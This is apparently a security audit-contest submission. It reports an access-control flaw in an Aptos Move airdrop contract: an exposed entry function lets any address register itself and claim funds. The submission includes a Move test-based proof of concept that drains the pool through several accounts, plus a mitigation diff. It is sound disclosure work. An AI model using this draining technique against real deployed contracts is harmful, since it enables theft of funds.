Submission Details
Severity:
Unauthorized self registration allows unprivileged claims
Root + Impact
Description
-
In a normal behaviour only the owner registers pizza lovers. Registered users can claim exactly once. The contract pays a random 100–500 APT from its funded balance
-
The issue is that the contract exposes an
entryfunction that any user can call to insert themselves into the registry.claim_pizza_slicethen accepts that registry entry without owner involvement, enabling unauthorized claims and pool draining via many accounts.
// Root cause in the codebase with @> marks to highlight the relevant section
public entry fun register_pizza_lover(owner: &signer, user: address) acquires ModuleData, State {
let state = borrow_global_mut<State>(get_resource_address());
assert!(signer::address_of(owner) == state.owner, E_NOT_OWNER);
@> get_random_slice(user);
event::emit(PizzaLoverRegistered {
user: user,
});
}
#[randomness]
@> entry fun get_random_slice(user_addr: address) acquires ModuleData, State {
let state = borrow_global_mut<State>(get_resource_address());
let time = timestamp::now_microseconds();
let random_val = time % 401;
let random_amount = 100 + random_val;
@> table::add(&mut state.users_claimed_amount, user_addr, random_amount);
}
public entry fun claim_pizza_slice(user: &signer) acquires ModuleData, State {
let user_addr = signer::address_of(user);
let state = borrow_global_mut<State>(get_resource_address());
@> assert!(table::contains(&state.users_claimed_amount, user_addr), E_NOT_REGISTERED);
assert!(!table::contains(&state.claimed_users, user_addr), E_ALREADY_CLAIMED);
let amount = *table::borrow(&state.users_claimed_amount, user_addr);
transfer_from_contract(user_addr, amount);
table::add(&mut state.claimed_users, user_addr, true);
}
Risk
Likelihood:
-
Occurs whenever the contract is funded and deployed
-
Literally any address can call
get_random_sliceand thenclaim_pizza_slicewithout owner approval.
Impact:
-
Unregistered users obtain APT directly from the pool
-
Theft of funds
Proof of Concept
Test command aptos move test --named-addresses pizza_drop=0x123
#[test_only]
module pizza_drop::vulnerability_test {
use std::signer;
use aptos_framework::account;
use aptos_framework::timestamp;
use aptos_framework::coin;
use aptos_framework::aptos_coin::{Self, AptosCoin};
use pizza_drop::airdrop;
#[test(deployer = @pizza_drop, attacker = @0x999, framework = @0x1)]
fun test_unauthorized_registration_exploit(
deployer: &signer,
attacker: &signer,
framework: &signer
) {
// Setup
timestamp::set_time_has_started_for_testing(framework);
let (burn_cap, mint_cap) = aptos_coin::initialize_for_test(framework);
account::create_account_for_test(@pizza_drop);
account::create_account_for_test(signer::address_of(attacker));
// Initialize the airdrop module
airdrop::init_module(deployer);
// Owner funds the contract legitimately
let funding_amount = 100000; // 0.001 APT
let deployer_coins = coin::mint<AptosCoin>(funding_amount, &mint_cap);
coin::register<AptosCoin>(deployer);
coin::deposit<AptosCoin>(@pizza_drop, deployer_coins);
airdrop::fund_pizza_drop(deployer, 50000);
let initial_balance = airdrop::get_actual_apt_balance();
assert!(initial_balance == 50000, 1);
// Attacker directly calls get_random_slice without owner permission
let attacker_addr = signer::address_of(attacker);
// Before exploit: attacker is not registered
assert!(!airdrop::is_registered(attacker_addr), 2);
// Direct call to entry function bypasses owner check
airdrop::get_random_slice(attacker_addr);
// After exploit: attacker is registered without owner approval
assert!(airdrop::is_registered(attacker_addr), 3);
// Attacker can now claim funds
let assigned_amount = airdrop::get_claimed_amount(attacker_addr);
assert!(assigned_amount >= 100 && assigned_amount <= 500, 4);
// Attacker claims the funds
airdrop::claim_pizza_slice(attacker);
// Verify attacker received funds
let attacker_balance = coin::balance<AptosCoin>(attacker_addr);
assert!(attacker_balance == assigned_amount, 5);
// Contract lost funds to unauthorized user
let final_balance = airdrop::get_actual_apt_balance();
assert!(final_balance == initial_balance - assigned_amount, 6);
coin::destroy_burn_cap(burn_cap);
coin::destroy_mint_cap(mint_cap);
}
#[test(deployer = @pizza_drop, attacker = @0x999, victim = @0x777, framework = @0x1)]
fun test_register_others_exploit(
deployer: &signer,
attacker: &signer,
victim: &signer,
framework: &signer
) {
timestamp::set_time_has_started_for_testing(framework);
let (burn_cap, mint_cap) = aptos_coin::initialize_for_test(framework);
account::create_account_for_test(@pizza_drop);
account::create_account_for_test(signer::address_of(attacker));
account::create_account_for_test(signer::address_of(victim));
airdrop::init_module(deployer);
// Fund contract
let deployer_coins = coin::mint<AptosCoin>(100000, &mint_cap);
coin::register<AptosCoin>(deployer);
coin::deposit<AptosCoin>(@pizza_drop, deployer_coins);
airdrop::fund_pizza_drop(deployer, 50000);
let victim_addr = signer::address_of(victim);
// Attacker registers victims address
airdrop::get_random_slice(victim_addr);
// Victim is now registered without consent
assert!(airdrop::is_registered(victim_addr), 1);
let amount = airdrop::get_claimed_amount(victim_addr);
assert!(amount >= 100 && amount <= 500, 2);
// Clean up
coin::destroy_burn_cap(burn_cap);
coin::destroy_mint_cap(mint_cap);
}
#[test(deployer = @pizza_drop, attacker = @0x999, framework = @0x1)]
fun test_drain_contract_funds(
deployer: &signer,
attacker: &signer,
framework: &signer
) {
// Setup
timestamp::set_time_has_started_for_testing(framework);
let (burn_cap, mint_cap) = aptos_coin::initialize_for_test(framework);
account::create_account_for_test(@pizza_drop);
airdrop::init_module(deployer);
// Fund contract with significant amount
let deployer_coins = coin::mint<AptosCoin>(1000000, &mint_cap);
coin::register<AptosCoin>(deployer);
coin::deposit<AptosCoin>(@pizza_drop, deployer_coins);
airdrop::fund_pizza_drop(deployer, 500000);
// Attacker creates multiple accounts and drains funds
let mut total_stolen = 0u64;
let mut i = 0u64;
while (i < 5) {
let attack_account = account::create_account_for_test(@0x1000 + i);
let attack_addr = signer::address_of(&attack_account);
// Register each attack account
airdrop::get_random_slice(attack_addr);
let amount = airdrop::get_claimed_amount(attack_addr);
// Claim with each account
airdrop::claim_pizza_slice(&attack_account);
total_stolen = total_stolen + amount;
i = i + 1;
};
// Verify significant funds were stolen
assert!(total_stolen >= 500, 1); // At least 500 octas stolen
let final_balance = airdrop::get_actual_apt_balance();
assert!(final_balance == 500000 - total_stolen, 2);
// Clean up
coin::destroy_burn_cap(burn_cap);
coin::destroy_mint_cap(mint_cap);
}
}
Recommended Mitigation
- #[randomness]
- entry fun get_random_slice(user_addr: address) acquires ModuleData, State {
+ // Internal or friend-only. Do not expose as an entry function.
+ #[randomness]
+ fun get_random_slice(user_addr: address) acquires ModuleData, State {
let state = borrow_global_mut<State>(get_resource_address());
let time = timestamp::now_microseconds();
let random_val = time % 401;
let random_amount = 100 + random_val;
table::add(&mut state.users_claimed_amount, user_addr, random_amount);
}
public entry fun register_pizza_lover(owner: &signer, user: address) acquires ModuleData, State {
let state = borrow_global_mut<State>(get_resource_address());
assert!(signer::address_of(owner) == state.owner, E_NOT_OWNER);
+ // Only owner can populate the registry
get_random_slice(user);
event::emit(PizzaLoverRegistered { user: user });
}
Updates
Appeal created
bube 11 days ago
Submission Judgement Published Assigned finding tags:
Anyone can call `get_random_slice` function
Rewards breakdown
nSLOC
125This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.